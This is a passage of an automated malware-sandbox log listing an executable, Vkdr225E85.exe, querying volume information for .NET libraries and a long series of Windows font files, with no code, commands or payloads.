              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Vkdr225E85.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
